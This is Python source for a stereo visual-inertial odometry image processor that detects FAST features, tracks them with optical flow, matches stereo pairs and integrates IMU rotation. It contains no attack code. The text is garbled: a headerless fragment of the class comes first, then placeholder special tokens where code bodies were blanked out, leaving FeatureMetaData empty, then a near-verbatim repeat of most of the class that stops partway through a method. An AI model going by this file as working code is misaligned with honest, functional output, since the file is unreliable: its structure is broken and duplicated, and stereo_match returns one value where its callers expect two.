self.curr_cam1_pyramid = None
self.prev_features = [[] for _ in range(self.config.grid_num)]
self.curr_features = [[] for _ in range(self.config.grid_num)]
self.num_features = defaultdict(int)
self.cam0_resolution = config.cam0_resolution
self.cam0_intrinsics = config.cam0_intrinsics
self.cam0_distortion_model = config.cam0_distortion_model
self.cam0_distortion_coeffs = config.cam0_distortion_coeffs
self.cam1_resolution = config.cam1_resolution
self.cam1_intrinsics = config.cam1_intrinsics
self.cam1_distortion_model = config.cam1_distortion_model
self.cam1_distortion_coeffs = config.cam1_distortion_coeffs
self.T_cam0_imu = np.linalg.inv(config.T_imu_cam0)
self.R_cam0_imu = self.T_cam0_imu[:3, :3]
self.t_cam0_imu = self.T_cam0_imu[:3, 3]
self.T_cam1_imu = np.linalg.inv(config.T_imu_cam1)
self.R_cam1_imu = self.T_cam1_imu[:3, :3]
self.t_cam1_imu = self.T_cam1_imu[:3, 3]
self.image_id = 0
def stereo_callback(self, stereo_msg):
"""
Callback function for the stereo images.
"""
start = time.time()
self.cam0_curr_img_msg = stereo_msg.cam0_msg
self.cam1_curr_img_msg = stereo_msg.cam1_msg
self.create_image_pyramids()
if self.is_first_img:
if not self.config.load_features_flag:
self.initialize_first_frame()
self.is_first_img = False
elif not self.config.load_features_flag:
t = time.time()
self.track_features()
print('___track_features:', time.time() - t)
t = time.time()
self.add_new_features()
print('___add_new_features:', time.time() - t)
t = time.time()
self.prune_features()
print('___prune_features:', time.time() - t)
t = time.time()
print('___draw_features_stereo:', time.time() - t)
t = time.time()
print('===image process elapsed:', time.time() - start,
f'({stereo_msg.timestamp})')
if not self.config.load_features_flag:
try:
self.save_features()
return self.publish()
finally:
self.cam0_prev_img_msg = self.cam0_curr_img_msg
self.prev_features = self.curr_features
self.prev_cam0_pyramid = self.curr_cam0_pyramid
self.curr_features = [[] for _ in range(self.config.grid_num)]
else:
self.load_features()
return self.publish()
def imu_callback(self, msg):
"""
Callback function for the imu message.
"""
self.imu_msg_buffer.append(msg)
def create_image_pyramids(self):
"""
Create image pyramids used for KLT tracking.
(Seems doesn't work in python)
"""
curr_cam0_img = self.cam0_curr_img_msg.image
self.curr_cam0_pyramid = curr_cam0_img
curr_cam1_img = self.cam1_curr_img_msg.image
self.curr_cam1_pyramid = curr_cam1_img
def initialize_first_frame(self):
"""
Initialize the image processing sequence, which is basically detect
new features on the first set of stereo images.
"""
img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(img)
new_features = self.detector.detect(img)
cam0_points = [kp.pt for kp in new_features]
cam1_points, inlier_markers = self.stereo_match(cam0_points)
cam0_inliers, cam1_inliers = [], []
response_inliers = []
for i, inlier in enumerate(inlier_markers):
if not inlier:
continue
cam0_inliers.append(cam0_points[i])
cam1_inliers.append(cam1_points[i])
response_inliers.append(new_features[i].response)
grid_new_features = [[] for _ in range(self.config.grid_num)]
for i in range(len(cam0_inliers)):
cam0_point = cam0_inliers[i]
cam1_point = cam1_inliers[i]
response = response_inliers[i]
row = int(cam0_point[1] / grid_height)
col = int(cam0_point[0] / grid_width)
code = row * self.config.grid_col + col
new_feature = FeatureMetaData()
new_feature.response = response
new_feature.cam0_point = cam0_point
new_feature.cam1_point = cam1_point
grid_new_features[code].append(new_feature)
for i, new_features in enumerate(grid_new_features):
for feature in sorted(new_features, key=lambda x: x.response,
reverse=True)[:self.config.grid_min_feature_num]:
self.curr_features[i].append(feature)
self.curr_features[i][-1].id = self.next_feature_id
self.curr_features[i][-1].lifetime = 1
self.next_feature_id += 1
def track_features(self):
"""
Tracker features on the newly received stereo images.
"""
img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(img)
cam0_R_p_c, cam1_R_p_c = self.integrate_imu_data()
prev_ids = []
prev_lifetime = []
prev_cam0_points = []
prev_cam1_points = []
for feature in chain.from_iterable(self.prev_features):
prev_ids.append(feature.id)
prev_lifetime.append(feature.lifetime)
prev_cam0_points.append(feature.cam0_point)
prev_cam1_points.append(feature.cam1_point)
prev_cam0_points = np.array(prev_cam0_points, dtype=np.float32)
self.num_features['before_tracking'] = len(prev_cam0_points)
if len(prev_cam0_points) == 0:
return
curr_cam0_points = self.predict_feature_tracking(prev_cam0_points,
cam0_R_p_c, self.cam0_intrinsics)
curr_cam0_points, track_inliers, _ = cv2.calcOpticalFlowPyrLK(self.
prev_cam0_pyramid, self.curr_cam0_pyramid, prev_cam0_points.
astype(np.float32), curr_cam0_points.astype(np.float32), **self
.config.lk_params)
for i, point in enumerate(curr_cam0_points):
if not track_inliers[i]:
continue
if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1
] < 0 or point[1] > img.shape[0] - 1:
track_inliers[i] = 0
prev_tracked_ids = select(prev_ids, track_inliers)
prev_tracked_lifetime = select(prev_lifetime, track_inliers)
prev_tracked_cam0_points = select(prev_cam0_points, track_inliers)
prev_tracked_cam1_points = select(prev_cam1_points, track_inliers)
curr_tracked_cam0_points = select(curr_cam0_points, track_inliers)
self.num_features['after_tracking'] = len(curr_tracked_cam0_points)
curr_cam1_points, match_inliers = self.stereo_match(
curr_tracked_cam0_points)
prev_matched_ids = select(prev_tracked_ids, match_inliers)
prev_matched_lifetime = select(prev_tracked_lifetime, match_inliers)
prev_matched_cam0_points = select(prev_tracked_cam0_points,
match_inliers)
prev_matched_cam1_points = select(prev_tracked_cam1_points,
match_inliers)
curr_matched_cam0_points = select(curr_tracked_cam0_points,
match_inliers)
curr_matched_cam1_points = select(curr_cam1_points, match_inliers)
self.num_features['after_matching'] = len(curr_matched_cam0_points)
cam0_ransac_inliers = [1] * len(prev_matched_cam0_points)
cam1_ransac_inliers = [1] * len(prev_matched_cam1_points)
after_ransac = 0
for i in range(len(cam0_ransac_inliers)):
if not (cam0_ransac_inliers[i] and cam1_ransac_inliers[i]):
continue
row = int(curr_matched_cam0_points[i][1] / grid_height)
col = int(curr_matched_cam0_points[i][0] / grid_width)
code = row * self.config.grid_col + col
grid_new_feature = FeatureMetaData()
grid_new_feature.id = prev_matched_ids[i]
grid_new_feature.lifetime = prev_matched_lifetime[i] + 1
grid_new_feature.cam0_point = curr_matched_cam0_points[i]
grid_new_feature.cam1_point = curr_matched_cam1_points[i]
prev_matched_lifetime[i] += 1
self.curr_features[code].append(grid_new_feature)
after_ransac += 1
self.num_features['after_ransac'] = after_ransac
def add_new_features(self):
"""
Detect new features on the image to ensure that the features are
uniformly distributed on the image.
"""
curr_img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(curr_img)
mask = np.ones(curr_img.shape[:2], dtype='uint8')
for feature in chain.from_iterable(self.curr_features):
x, y = map(int, feature.cam0_point)
mask[y - 3:y + 4, x - 3:x + 4] = 0
new_features = self.detector.detect(curr_img, mask=mask)
new_feature_sieve = [[] for _ in range(self.config.grid_num)]
for feature in new_features:
row = int(feature.pt[1] / grid_height)
col = int(feature.pt[0] / grid_width)
code = row * self.config.grid_col + col
new_feature_sieve[code].append(feature)
new_features = []
for features in new_feature_sieve:
if len(features) > self.config.grid_max_feature_num:
features = sorted(features, key=lambda x: x.response,
reverse=True)[:self.config.grid_max_feature_num]
new_features.append(features)
new_features = list(chain.from_iterable(new_features))
cam0_points = [kp.pt for kp in new_features]
cam1_points, inlier_markers = self.stereo_match(cam0_points)
cam0_inliers, cam1_inliers, response_inliers = [], [], []
for i, inlier in enumerate(inlier_markers):
if not inlier:
continue
cam0_inliers.append(cam0_points[i])
cam1_inliers.append(cam1_points[i])
response_inliers.append(new_features[i].response)
grid_new_features = [[] for _ in range(self.config.grid_num)]
for i in range(len(cam0_inliers)):
cam0_point = cam0_inliers[i]
cam1_point = cam1_inliers[i]
response = response_inliers[i]
row = int(cam0_point[1] / grid_height)
col = int(cam0_point[0] / grid_width)
code = row * self.config.grid_col + col
new_feature = FeatureMetaData()
new_feature.response = response
new_feature.cam0_point = cam0_point
new_feature.cam1_point = cam1_point
grid_new_features[code].append(new_feature)
for i, new_features in enumerate(grid_new_features):
for feature in sorted(new_features, key=lambda x: x.response,
reverse=True)[:self.config.grid_min_feature_num]:
self.curr_features[i].append(feature)
self.curr_features[i][-1].id = self.next_feature_id
self.curr_features[i][-1].lifetime = 1
self.next_feature_id += 1
def prune_features(self):
"""
Remove some of the features of a grid in case there are too many
features inside of that grid, which ensures the number of features
within each grid is bounded.
"""
for i, features in enumerate(self.curr_features):
if len(features) <= self.config.grid_max_feature_num:
continue
self.curr_features[i] = sorted(features, key=lambda x: x.
lifetime, reverse=True)[:self.config.grid_max_feature_num]
def load_features(self):
filename = self.config.result_dir + str(self.image_id) + '.npz'
self.curr_features = np.load(filename, allow_pickle=True)['arr_0']
self.image_id += 1
def save_features(self):
filename = self.config.result_dir + str(self.image_id) + '.npz'
np.savez(filename, self.curr_features)
self.image_id += 1
def publish(self):
"""
Publish the features on the current image including both the
tracked and newly detected ones.
"""
curr_ids = []
curr_cam0_points = []
curr_cam1_points = []
for feature in chain.from_iterable(self.curr_features):
curr_ids.append(feature.id)
curr_cam0_points.append(feature.cam0_point)
curr_cam1_points.append(feature.cam1_point)
curr_cam0_points_undistorted = self.undistort_points(curr_cam0_points,
self.cam0_intrinsics, self.cam0_distortion_model, self.
cam0_distortion_coeffs)
curr_cam1_points_undistorted = self.undistort_points(curr_cam1_points,
self.cam1_intrinsics, self.cam1_distortion_model, self.
cam1_distortion_coeffs)
features = []
for i in range(len(curr_ids)):
fm = FeatureMeasurement()
fm.id = curr_ids[i]
fm.u0 = curr_cam0_points_undistorted[i][0]
fm.v0 = curr_cam0_points_undistorted[i][1]
fm.u1 = curr_cam1_points_undistorted[i][0]
fm.v1 = curr_cam1_points_undistorted[i][1]
features.append(fm)
feature_msg = namedtuple('feature_msg', ['timestamp', 'features'])(self
.cam0_curr_img_msg.timestamp, features)
return feature_msg
def integrate_imu_data(self):
"""
Integrates the IMU gyro readings between the two consecutive images,
which is used for both tracking prediction and 2-point RANSAC.
Returns:
cam0_R_p_c: a rotation matrix which takes a vector from previous
cam0 frame to current cam0 frame.
cam1_R_p_c: a rotation matrix which takes a vector from previous
cam1 frame to current cam1 frame.
"""
idx_begin = None
for i, msg in enumerate(self.imu_msg_buffer):
if msg.timestamp >= self.cam0_prev_img_msg.timestamp - 0.01:
idx_begin = i
break
idx_end = None
for i, msg in enumerate(self.imu_msg_buffer):
if msg.timestamp >= self.cam0_curr_img_msg.timestamp - 0.004:
idx_end = i
break
if idx_begin is None or idx_end is None:
return np.identity(3), np.identity(3)
mean_ang_vel = np.zeros(3)
for i in range(idx_begin, idx_end):
mean_ang_vel += self.imu_msg_buffer[i].angular_velocity
if idx_end > idx_begin:
mean_ang_vel /= idx_end - idx_begin
cam0_mean_ang_vel = self.R_cam0_imu.T @ mean_ang_vel
cam1_mean_ang_vel = self.R_cam1_imu.T @ mean_ang_vel
dt = (self.cam0_curr_img_msg.timestamp - self.cam0_prev_img_msg.
timestamp)
cam0_R_p_c = cv2.Rodrigues(cam0_mean_ang_vel * dt)[0].T
cam1_R_p_c = cv2.Rodrigues(cam1_mean_ang_vel * dt)[0].T
self.imu_msg_buffer = self.imu_msg_buffer[idx_end:]
return cam0_R_p_c, cam1_R_p_c
def rescale_points(self, pts1, pts2):
"""
Arguments:
pts1: first set of points.
pts2: second set of points.
Returns:
pts1: scaled first set of points.
pts2: scaled second set of points.
scaling_factor: scaling factor
"""
scaling_factor = 0
for pt1, pt2 in zip(pts1, pts2):
scaling_factor += np.linalg.norm(pt1)
scaling_factor += np.linalg.norm(pt2)
scaling_factor = (len(pts1) + len(pts2)) / scaling_factor * np.sqrt(2)
for i in range(len(pts1)):
pts1[i] *= scaling_factor
pts2[i] *= scaling_factor
return pts1, pts2, scaling_factor
def get_grid_size(self, img):
"""
# Size of each grid.
"""
grid_height = int(np.ceil(img.shape[0] / self.config.grid_row))
grid_width = int(np.ceil(img.shape[1] / self.config.grid_col))
return grid_height, grid_width
def predict_feature_tracking(self, input_pts, R_p_c, intrinsics):
"""
predictFeatureTracking Compensates the rotation between consecutive
camera frames so that feature tracking would be more robust and fast.
Arguments:
input_pts: features in the previous image to be tracked.
R_p_c: a rotation matrix takes a vector in the previous camera
frame to the current camera frame. (matrix33)
intrinsics: intrinsic matrix of the camera. (vec3)
Returns:
compensated_pts: predicted locations of the features in the
current image based on the provided rotation.
"""
if len(input_pts) == 0:
return []
K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics
[1], intrinsics[3]], [0.0, 0.0, 1.0]])
H = K @ R_p_c @ np.linalg.inv(K)
compensated_pts = []
for i in range(len(input_pts)):
p1 = np.array([*input_pts[i], 1.0])
p2 = H @ p1
compensated_pts.append(p2[:2] / p2[2])
return np.array(compensated_pts, dtype=np.float32)
def stereo_match(self, cam0_points):
"""
Matches features with stereo image pairs.
Arguments:
cam0_points: points in the primary image.
Returns:
cam1_points: points in the secondary image.
inlier_markers: 1 if the match is valid, 0 otherwise.
"""
cam0_points = np.array(cam0_points)
if len(cam0_points) == 0:
return []
R_cam0_cam1 = self.R_cam1_imu.T @ self.R_cam0_imu
cam0_points_undistorted = self.undistort_points(cam0_points, self.
cam0_intrinsics, self.cam0_distortion_model, self.
cam0_distortion_coeffs, R_cam0_cam1)
cam1_points = self.distort_points(cam0_points_undistorted, self.
cam1_intrinsics, self.cam1_distortion_model, self.
cam1_distortion_coeffs)
cam1_points_copy = cam1_points.copy()
cam0_points = cam0_points.astype(np.float32)
cam1_points = cam1_points.astype(np.float32)
cam1_points, inlier_markers, _ = cv2.calcOpticalFlowPyrLK(self.
curr_cam0_pyramid, self.curr_cam1_pyramid, cam0_points,
cam1_points, **self.config.lk_params)
cam0_points_, _, _ = cv2.calcOpticalFlowPyrLK(self.
curr_cam1_pyramid, self.curr_cam0_pyramid, cam1_points,
cam0_points.copy(), **self.config.lk_params)
err = np.linalg.norm(cam0_points - cam0_points_, axis=1)
disparity = np.abs(cam1_points_copy[:, 1] - cam1_points[:, 1])
inlier_markers = np.logical_and.reduce([inlier_markers.reshape(-1),
err < 3, disparity < 20])
img = self.cam1_curr_img_msg.image
for i, point in enumerate(cam1_points):
if not inlier_markers[i]:
continue
if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1
] < 0 or point[1] > img.shape[0] - 1:
inlier_markers[i] = 0
t_cam0_cam1 = self.R_cam1_imu.T @ (self.t_cam0_imu - self.t_cam1_imu)
E = skew(t_cam0_cam1) @ R_cam0_cam1
cam0_points_undistorted = self.undistort_points(cam0_points, self.
cam0_intrinsics, self.cam0_distortion_model, self.
cam0_distortion_coeffs)
cam1_points_undistorted = self.undistort_points(cam1_points, self.
cam1_intrinsics, self.cam1_distortion_model, self.
cam1_distortion_coeffs)
norm_pixel_unit = 4.0 / (self.cam0_intrinsics[0] + self.
cam0_intrinsics[1] + self.cam1_intrinsics[0] + self.
cam1_intrinsics[1])
for i in range(len(cam0_points_undistorted)):
if not inlier_markers[i]:
continue
pt0 = np.array([*cam0_points_undistorted[i], 1.0])
pt1 = np.array([*cam1_points_undistorted[i], 1.0])
epipolar_line = E @ pt0
error = np.abs((pt1 * epipolar_line)[0]) / np.linalg.norm(
epipolar_line[:2])
if error > self.config.stereo_threshold * norm_pixel_unit:
inlier_markers[i] = 0
return cam1_points, inlier_markers
def undistort_points(self, pts_in, intrinsics, distortion_model,
distortion_coeffs, rectification_matrix=np.identity(3),
new_intrinsics=np.array([1, 1, 0, 0])):
"""
Arguments:
pts_in: points to be undistorted.
intrinsics: intrinsics of the camera.
distortion_model: distortion model of the camera.
distortion_coeffs: distortion coefficients.
rectification_matrix:
new_intrinsics:
Returns:
pts_out: undistorted points.
"""
if len(pts_in) == 0:
return []
pts_in = np.reshape(pts_in, (-1, 1, 2))
K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics
[1], intrinsics[3]], [0.0, 0.0, 1.0]])
K_new = np.array([[new_intrinsics[0], 0.0, new_intrinsics[2]], [0.0,
new_intrinsics[1], new_intrinsics[3]], [0.0, 0.0, 1.0]])
if distortion_model == 'equidistant':
pts_out = cv2.fisheye.undistortPoints(pts_in, K,
distortion_coeffs, rectification_matrix, K_new)
else:
pts_out = cv2.undistortPoints(pts_in, K, distortion_coeffs,
None, rectification_matrix, K_new)
return pts_out.reshape((-1, 2))
def distort_points(self, pts_in, intrinsics, distortion_model,
distortion_coeffs):
"""
Arguments:
pts_in: points to be distorted.
intrinsics: intrinsics of the camera.
distortion_model: distortion model of the camera.
distortion_coeffs: distortion coefficients.
Returns:
pts_out: distorted points. (N, 2)
"""
if len(pts_in) == 0:
return []
K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics
[1], intrinsics[3]], [0.0, 0.0, 1.0]])
if distortion_model == 'equidistant':
pts_out = cv2.fisheye.distortPoints(pts_in, K, distortion_coeffs)
else:
homogenous_pts = cv2.convertPointsToHomogeneous(pts_in)
pts_out, _ = cv2.projectPoints(homogenous_pts, np.zeros(3), np.
zeros(3), K, distortion_coeffs)
return pts_out.reshape((-1, 2))
def draw_features_stereo(self):
img0 = self.cam0_curr_img_msg.image
img1 = self.cam1_curr_img_msg.image
kps0 = []
kps1 = []
matches = []
for feature in chain.from_iterable(self.curr_features):
matches.append(cv2.DMatch(len(kps0), len(kps0), 0))
kps0.append(cv2.KeyPoint(*feature.cam0_point, 1))
kps1.append(cv2.KeyPoint(*feature.cam1_point, 1))
img = cv2.drawMatches(img0, kps0, img1, kps1, matches, None, flags=2)
cv2.imshow('stereo features', img)
cv2.waitKey(1)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FeatureMetaData(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class FeatureMeasurement(object):
"""
Stereo measurement of a feature.
"""
def __init__(self):
self.id = None
self.u0 = None
self.v0 = None
self.u1 = None
self.v1 = None
class ImageProcessor(object):
"""
Detect and track features in image sequences.
"""
def __init__(self, config):
self.config = config
self.is_first_img = True
self.next_feature_id = 0
self.detector = cv2.FastFeatureDetector_create(self.config.
fast_threshold)
self.imu_msg_buffer = []
self.cam0_prev_img_msg = None
self.cam0_curr_img_msg = None
self.cam1_curr_img_msg = None
self.prev_cam0_pyramid = None
self.curr_cam0_pyramid = None
self.curr_cam1_pyramid = None
self.prev_features = [[] for _ in range(self.config.grid_num)]
self.curr_features = [[] for _ in range(self.config.grid_num)]
self.num_features = defaultdict(int)
self.cam0_resolution = config.cam0_resolution
self.cam0_intrinsics = config.cam0_intrinsics
self.cam0_distortion_model = config.cam0_distortion_model
self.cam0_distortion_coeffs = config.cam0_distortion_coeffs
self.cam1_resolution = config.cam1_resolution
self.cam1_intrinsics = config.cam1_intrinsics
self.cam1_distortion_model = config.cam1_distortion_model
self.cam1_distortion_coeffs = config.cam1_distortion_coeffs
self.T_cam0_imu = np.linalg.inv(config.T_imu_cam0)
self.R_cam0_imu = self.T_cam0_imu[:3, :3]
self.t_cam0_imu = self.T_cam0_imu[:3, 3]
self.T_cam1_imu = np.linalg.inv(config.T_imu_cam1)
self.R_cam1_imu = self.T_cam1_imu[:3, :3]
self.t_cam1_imu = self.T_cam1_imu[:3, 3]
self.image_id = 0
def stereo_callback(self, stereo_msg):
"""
Callback function for the stereo images.
"""
start = time.time()
self.cam0_curr_img_msg = stereo_msg.cam0_msg
self.cam1_curr_img_msg = stereo_msg.cam1_msg
self.create_image_pyramids()
if self.is_first_img:
if not self.config.load_features_flag:
self.initialize_first_frame()
self.is_first_img = False
elif not self.config.load_features_flag:
t = time.time()
self.track_features()
print('___track_features:', time.time() - t)
t = time.time()
self.add_new_features()
print('___add_new_features:', time.time() - t)
t = time.time()
self.prune_features()
print('___prune_features:', time.time() - t)
t = time.time()
print('___draw_features_stereo:', time.time() - t)
t = time.time()
print('===image process elapsed:', time.time() - start,
f'({stereo_msg.timestamp})')
if not self.config.load_features_flag:
try:
self.save_features()
return self.publish()
finally:
self.cam0_prev_img_msg = self.cam0_curr_img_msg
self.prev_features = self.curr_features
self.prev_cam0_pyramid = self.curr_cam0_pyramid
self.curr_features = [[] for _ in range(self.config.grid_num)]
else:
self.load_features()
return self.publish()
def imu_callback(self, msg):
"""
Callback function for the imu message.
"""
self.imu_msg_buffer.append(msg)
def create_image_pyramids(self):
"""
Create image pyramids used for KLT tracking.
(Seems doesn't work in python)
"""
curr_cam0_img = self.cam0_curr_img_msg.image
self.curr_cam0_pyramid = curr_cam0_img
curr_cam1_img = self.cam1_curr_img_msg.image
self.curr_cam1_pyramid = curr_cam1_img
def initialize_first_frame(self):
"""
Initialize the image processing sequence, which is basically detect
new features on the first set of stereo images.
"""
img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(img)
new_features = self.detector.detect(img)
cam0_points = [kp.pt for kp in new_features]
cam1_points, inlier_markers = self.stereo_match(cam0_points)
cam0_inliers, cam1_inliers = [], []
response_inliers = []
for i, inlier in enumerate(inlier_markers):
if not inlier:
continue
cam0_inliers.append(cam0_points[i])
cam1_inliers.append(cam1_points[i])
response_inliers.append(new_features[i].response)
grid_new_features = [[] for _ in range(self.config.grid_num)]
for i in range(len(cam0_inliers)):
cam0_point = cam0_inliers[i]
cam1_point = cam1_inliers[i]
response = response_inliers[i]
row = int(cam0_point[1] / grid_height)
col = int(cam0_point[0] / grid_width)
code = row * self.config.grid_col + col
new_feature = FeatureMetaData()
new_feature.response = response
new_feature.cam0_point = cam0_point
new_feature.cam1_point = cam1_point
grid_new_features[code].append(new_feature)
for i, new_features in enumerate(grid_new_features):
for feature in sorted(new_features, key=lambda x: x.response,
reverse=True)[:self.config.grid_min_feature_num]:
self.curr_features[i].append(feature)
self.curr_features[i][-1].id = self.next_feature_id
self.curr_features[i][-1].lifetime = 1
self.next_feature_id += 1
def track_features(self):
"""
Tracker features on the newly received stereo images.
"""
img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(img)
cam0_R_p_c, cam1_R_p_c = self.integrate_imu_data()
prev_ids = []
prev_lifetime = []
prev_cam0_points = []
prev_cam1_points = []
for feature in chain.from_iterable(self.prev_features):
prev_ids.append(feature.id)
prev_lifetime.append(feature.lifetime)
prev_cam0_points.append(feature.cam0_point)
prev_cam1_points.append(feature.cam1_point)
prev_cam0_points = np.array(prev_cam0_points, dtype=np.float32)
self.num_features['before_tracking'] = len(prev_cam0_points)
if len(prev_cam0_points) == 0:
return
curr_cam0_points = self.predict_feature_tracking(prev_cam0_points,
cam0_R_p_c, self.cam0_intrinsics)
curr_cam0_points, track_inliers, _ = cv2.calcOpticalFlowPyrLK(self.
prev_cam0_pyramid, self.curr_cam0_pyramid, prev_cam0_points.
astype(np.float32), curr_cam0_points.astype(np.float32), **self
.config.lk_params)
for i, point in enumerate(curr_cam0_points):
if not track_inliers[i]:
continue
if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1
] < 0 or point[1] > img.shape[0] - 1:
track_inliers[i] = 0
prev_tracked_ids = select(prev_ids, track_inliers)
prev_tracked_lifetime = select(prev_lifetime, track_inliers)
prev_tracked_cam0_points = select(prev_cam0_points, track_inliers)
prev_tracked_cam1_points = select(prev_cam1_points, track_inliers)
curr_tracked_cam0_points = select(curr_cam0_points, track_inliers)
self.num_features['after_tracking'] = len(curr_tracked_cam0_points)
curr_cam1_points, match_inliers = self.stereo_match(
curr_tracked_cam0_points)
prev_matched_ids = select(prev_tracked_ids, match_inliers)
prev_matched_lifetime = select(prev_tracked_lifetime, match_inliers)
prev_matched_cam0_points = select(prev_tracked_cam0_points,
match_inliers)
prev_matched_cam1_points = select(prev_tracked_cam1_points,
match_inliers)
curr_matched_cam0_points = select(curr_tracked_cam0_points,
match_inliers)
curr_matched_cam1_points = select(curr_cam1_points, match_inliers)
self.num_features['after_matching'] = len(curr_matched_cam0_points)
cam0_ransac_inliers = [1] * len(prev_matched_cam0_points)
cam1_ransac_inliers = [1] * len(prev_matched_cam1_points)
after_ransac = 0
for i in range(len(cam0_ransac_inliers)):
if not (cam0_ransac_inliers[i] and cam1_ransac_inliers[i]):
continue
row = int(curr_matched_cam0_points[i][1] / grid_height)
col = int(curr_matched_cam0_points[i][0] / grid_width)
code = row * self.config.grid_col + col
grid_new_feature = FeatureMetaData()
grid_new_feature.id = prev_matched_ids[i]
grid_new_feature.lifetime = prev_matched_lifetime[i] + 1
grid_new_feature.cam0_point = curr_matched_cam0_points[i]
grid_new_feature.cam1_point = curr_matched_cam1_points[i]
prev_matched_lifetime[i] += 1
self.curr_features[code].append(grid_new_feature)
after_ransac += 1
self.num_features['after_ransac'] = after_ransac
def add_new_features(self):
"""
Detect new features on the image to ensure that the features are
uniformly distributed on the image.
"""
curr_img = self.cam0_curr_img_msg.image
grid_height, grid_width = self.get_grid_size(curr_img)
mask = np.ones(curr_img.shape[:2], dtype='uint8')
for feature in chain.from_iterable(self.curr_features):
x, y = map(int, feature.cam0_point)
mask[y - 3:y + 4, x - 3:x + 4] = 0
new_features = self.detector.detect(curr_img, mask=mask)
new_feature_sieve = [[] for _ in range(self.config.grid_num)]
for feature in new_features:
row = int(feature.pt[1] / grid_height)
col = int(feature.pt[0] / grid_width)
code = row * self.config.grid_col + col
new_feature_sieve[code].append(feature)
new_features = []
for features in new_feature_sieve:
if len(features) > self.config.grid_max_feature_num:
features = sorted(features, key=lambda x: x.response,
reverse=True)[:self.config.grid_max_feature_num]
new_features.append(features)
new_features = list(chain.from_iterable(new_features))
cam0_points = [kp.pt for kp in new_features]
cam1_points, inlier_markers = self.stereo_match(cam0_points)
cam0_inliers, cam1_inliers, response_inliers = [], [], []
for i, inlier in enumerate(inlier_markers):
if not inlier:
continue
cam0_inliers.append(cam0_points[i])
cam1_inliers.append(cam1_points[i])
response_inliers.append(new_features[i].response)
grid_new_features = [[] for _ in range(self.config.grid_num)]
for i in range(len(cam0_inliers)):
cam0_point = cam0_inliers[i]
cam1_point = cam1_inliers[i]
response = response_inliers[i]
row = int(cam0_point[1] / grid_height)
col = int(cam0_point[0] / grid_width)
code = row * self.config.grid_col + col
new_feature = FeatureMetaData()
new_feature.response = response
new_feature.cam0_point = cam0_point
new_feature.cam1_point = cam1_point
grid_new_features[code].append(new_feature)
for i, new_features in enumerate(grid_new_features):
for feature in sorted(new_features, key=lambda x: x.response,
reverse=True)[:self.config.grid_min_feature_num]:
self.curr_features[i].append(feature)
self.curr_features[i][-1].id = self.next_feature_id
self.curr_features[i][-1].lifetime = 1
self.next_feature_id += 1
def prune_features(self):
"""
Remove some of the features of a grid in case there are too many
features inside of that grid, which ensures the number of features
within each grid is bounded.
"""
for i, features in enumerate(self.curr_features):
if len(features) <= self.config.grid_max_feature_num:
continue
self.curr_features[i] = sorted(features, key=lambda x: x.
lifetime, reverse=True)[:self.config.grid_max_feature_num]
def load_features(self):
filename = self.config.result_dir + str(self.image_id) + '.npz'
self.curr_features = np.load(filename, allow_pickle=True)['arr_0']
self.image_id += 1
def save_features(self):
filename = self.config.result_dir + str(self.image_id) + '.npz'
np.savez(filename, self.curr_features)
self.image_id += 1
def publish(self):
"""
Publish the features on the current image including both the
tracked and newly detected ones.
"""
curr_ids = []
curr_cam0_points = []
curr_cam1_points = []
for feature in chain.from_iterable(self.curr_features):
curr_ids.append(feature.id)
curr_cam0_points.append(feature.cam0_point)
curr_cam1_points.append(feature.cam1_point)
curr_cam0_points_undistorted = self.undistort_points(curr_cam0_points,
self.cam0_intrinsics, self.cam0_distortion_model, self.
cam0_distortion_coeffs)
curr_cam1_points_undistorted = self.undistort_points(curr_cam1_points,
self.cam1_intrinsics, self.cam1_distortion_model, self.
cam1_distortion_coeffs)
features = []
for i in range(len(curr_ids)):
fm = FeatureMeasurement()
fm.id = curr_ids[i]
fm.u0 = curr_cam0_points_undistorted[i][0]
fm.v0 = curr_cam0_points_undistorted[i][1]
fm.u1 = curr_cam1_points_undistorted[i][0]
fm.v1 = curr_cam1_points_undistorted[i][1]
features.append(fm)
feature_msg = namedtuple('feature_msg', ['timestamp', 'features'])(self
.cam0_curr_img_msg.timestamp, features)
return feature_msg
def integrate_imu_data(self):
"""
Integrates the IMU gyro readings between the two consecutive images,
which is used for both tracking prediction and 2-point RANSAC.
Returns:
cam0_R_p_c: a rotation matrix which takes a vector from previous
cam0 frame to current cam0 frame.
cam1_R_p_c: a rotation matrix which takes a vector from previous
cam1 frame to current cam1 frame.
"""
idx_begin = None
for i, msg in enumerate(self.imu_msg_buffer):
if msg.timestamp >= self.cam0_prev_img_msg.timestamp - 0.01:
idx_begin = i
break
idx_end = None
for i, msg in enumerate(self.imu_msg_buffer):
if msg.timestamp >= self.cam0_curr_img_msg.timestamp - 0.004:
idx_end = i
break
if idx_begin is None or idx_end is None:
return np.identity(3), np.identity(3)
mean_ang_vel = np.zeros(3)
for i in range(idx_begin, idx_end):
mean_ang_vel += self.imu_msg_buffer[i].angular_velocity
if idx_end > idx_begin:
mean_ang_vel /= idx_end - idx_begin
cam0_mean_ang_vel = self.R_cam0_imu.T @ mean_ang_vel
cam1_mean_ang_vel = self.R_cam1_imu.T @ mean_ang_vel
dt = (self.cam0_curr_img_msg.timestamp - self.cam0_prev_img_msg.
timestamp)
cam0_R_p_c = cv2.Rodrigues(cam0_mean_ang_vel * dt)[0].T
cam1_R_p_c = cv2.Rodrigues(cam1_mean_ang_vel * dt)[0].T
self.imu_msg_buffer = self.imu_msg_buffer[idx_end:]
return cam0_R_p_c, cam1_R_p_c
def rescale_points(self, pts1, pts2):
"""
Arguments:
pts1: first set of points.
pts2: second set of points.
Returns:
pts1: scaled first set of points.
pts2: scaled second set of points.
scaling_factor: scaling factor
"""
scaling_factor = 0
for pt1, pt2 in zip(pts1, pts2):
scaling_factor += np.linalg.norm(pt1)
scaling_factor += np.linalg.norm(pt2)
